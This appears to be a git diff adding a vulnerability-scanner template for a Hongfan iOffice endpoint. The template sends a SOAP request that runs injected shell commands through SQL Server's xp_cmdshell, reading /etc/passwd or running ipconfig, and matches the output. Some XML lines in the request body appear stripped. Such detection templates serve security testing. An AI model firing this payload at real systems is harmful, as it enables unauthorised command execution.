diff --git a/http/vulnerabilities/other/hongfan-ioffice-rce.yaml b/http/vulnerabilities/other/hongfan-ioffice-rce.yaml new file mode 100644 index 0000000000..d5cf54d195 --- /dev/null +++ b/http/vulnerabilities/other/hongfan-ioffice-rce.yaml @@ -0,0 +1,54 @@ +id: hongfan-ioffice-rce + +info: + name: Hongfan OA ioAssistance.asmx - Remote Code Execution + author: SleepingBag945 + severity: high + description: | + There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information. + reference: + - https://github.com/FridaZhbk/pocscan/blob/main/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py + metadata: + max-request: 1 + verified: true + fofa-query: app="红帆-ioffice" + tags: hongfan,oa,sqli + +http: + - raw: + - | + POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + + + + + + exec master.dbo.xp_cmdshell '{{command}}' + + + + + payloads: + command: + - '/bin/bash -c "cat /etc/passwd"' + - 'cmd /c ipconfig' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "Windows IP" + - "root:.*:0:0:" + condition: or + + - type: word + part: header + words: + - "text/xml" + + - type: status + status: + - 200